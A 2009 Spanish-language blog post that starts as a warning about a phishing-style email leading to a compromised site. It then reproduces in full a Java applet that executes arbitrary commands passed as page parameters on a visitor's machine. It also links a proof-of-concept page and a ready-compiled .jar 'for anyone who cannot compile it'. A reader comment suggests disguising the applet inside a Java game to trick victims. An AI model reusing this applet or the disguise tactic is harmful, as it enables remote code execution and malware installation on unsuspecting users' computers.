. Con la tecnología de Blogger.

viernes, 11 de septiembre de 2009

Guarda con los emails...

jaja , bueno ustedes pensaran que es otra forma de pishing o alguna de esas cosas , esta ves no
esta vulnerabilidad la ocnocia hace tiempo ya , por suerte..
se trata de ejecucion de codigo remota en una web.. jaja que buena que es si no se la conoce...
por cierto , el email lo mando una persona que tengo en mis contactos , al principio me enoje , por el echo de querer joderme, jaja , despues hablando con un conocido de el me dijo que estaba infectado al aprecer , pero bueno , no importal

el email que me enviaron fue este...claro.. al principio pense y dije.. este pelotudo defacea una web y se lo muestra a todo el mundo enviando emails ? es medio pajero.. jajaja
entre por curiosidad mas que nada.. a ver su gran owned... jajaja
al entrar a la web me tope con esto
mmm no veo nada.. y la deje cargando un ratito , pense que era un iframe esa cosa blanca
cosa que no lo era .________.lo que me hiso recordar... que quisieron infectar a algun pete que anda por ahí jajaja
obviamente no acepte el termino de seguridad de java , por que conosco este fallo.
googleando un poco pude encontrar el blog de ca0s
por el fue que conoci la tecnica...

http://st4ck-3rr0r.blogspot.com/2009/05/ejecucion-remota-de-codigo-desde-web.html

explicacion...
copy && paste de su blog

Se puede ejecutar codigo remotamente con la visita de la victima a una web usando un sencillo codigo en java:
Codigo:

import java.applet.*;
import java.awt.*;
import java.io.*;
public class skata extends Applet {
public void init() {
Process f;
String first = getParameter("first");
try{
f = Runtime.getRuntime().exec(first);

}
catch(IOException e){
e.printStackTrace();
}
Process s;
String second = getParameter("second");
try{
s = Runtime.getRuntime().exec(second);
}
catch(IOException e){
e.printStackTrace();
}
Process t;
String third = getParameter("third");
try{
t = Runtime.getRuntime().exec(third);
}
catch(IOException e){
e.printStackTrace();
}
}
}
En el servidor debe estar el archivo java compilado en .jar, y debe ser cargado asi:

FALTA EL CODIGO , MAS INFO EN EL BLOG DE CA0S

Donde skata.class y skataMPE.jar son el nombre de vuestros archivos.
Aquí un PoC:

http://st4ck-3rr0r.webcindario.com/java/index.php

Simplemente coge dos parámetros que se le pasan en el archivo htm donde está incrustado el applet y los ejecuta en el PC víctima.
Se puede ejecutar cualquier cosa, lo suyo sería detectar el SO con PHP y hacer una cosa u otra... cada uno que haga lo que quiera :)
Yo no pude compilar el codigo, lo subo por si alguien tampoco puede:
http://st4ck-3rr0r.webcindario.com/Java/skataMPE.jar

obviamente por curiosidad mirando el codigo fuente.. de la pagina hackeada

ahora... estan seguros cada ves que aceptan el certificado de seguridad de java ?
y si lo probamos en opera ?

jojo...
ni Firefox ni opera los tengo actualizados al dia...
tengo la ante ultima versión de los navegadores..
habría que probar actualizándolos , pero como tengo frizada la pc no me preocupo mucho

Saludos
Gracias a todas las personas que visitan y comentan en el blog :)

1 comentarios:

Ca0s 14 de septiembre de 2009, 5:54  

Eso, dame visitas ;-)
Muy lindo cuando se mezcla con algún juego en Java o así para despistar... aunque la gente es medio mongui y lo acepta aunque no salga nada U.U

Un saludo